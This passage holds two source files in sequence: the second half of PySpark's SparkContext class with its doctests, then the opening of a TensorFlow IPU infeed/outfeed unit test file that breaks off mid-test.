return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
objects are written to a file and loaded through textFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
return reader_func(tempFile.name)
finally:
# readRDDFromFile eagerily reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
:param path: path to sequncefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
infeed_outfeed_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import signal
import subprocess
import sys
from absl.testing import parameterized
from threading import Thread
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
from tensorflow.python import ipu
from tensorflow.python.client import session as session_lib
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import readers
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
class InfeedOutfeedTest(test_util.TensorFlowTestCase):
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + x
return v
def my_net(v):
r = ipu.loops.repeat(20, body, (v), infeed_queue)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(91, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatNonTupleFiniteDataset(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10,
shape=[4, 4],
repeat=False)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + x
return v
def my_net(v):
r = ipu.loops.repeat(10, body, (v), infeed_queue)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(46, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, im1, im2):
v = v + im1 + im2
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatTupleMerge(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.optimizations.merge_infeed_io_copies = True
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, im1, im2):
v = v + im1 + im2
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatNamed(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return {"a": image_1, "b": image_2}
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
# Note how the parameters are swapped around.
def body(v1, v2, b, a):
v1 = v1 + a
v2 = v2 + b
return (v1, v2)
def my_net():
v1 = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
v2 = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v1, v2], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(4, [4, 4]))
self.assertAllClose(result[1], np.broadcast_to(27, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedMultipleRepeats(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(2, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + x
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
r = ipu.loops.repeat(5, body, [r], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(5, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedWhileLoopNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def cond(i, v):
return i < 20
def body(i, v, x):
v = v + x
return (i + 1, v)
def my_net(v):
i = 0
r = ipu.loops.while_loop(cond, body, (i, v), infeed_queue)
return r[1]
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(91, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedWhileLoopTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def cond(i, v):
return i < 20
def body(i, v, im1, im2):
v = v + im1 + im2
return (i + 1, v)
def my_net(v):
i = 0
r = ipu.loops.while_loop(cond, body, (i, v), infeed_queue)
return r[1]
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(129.5, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedMultipleRuns(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
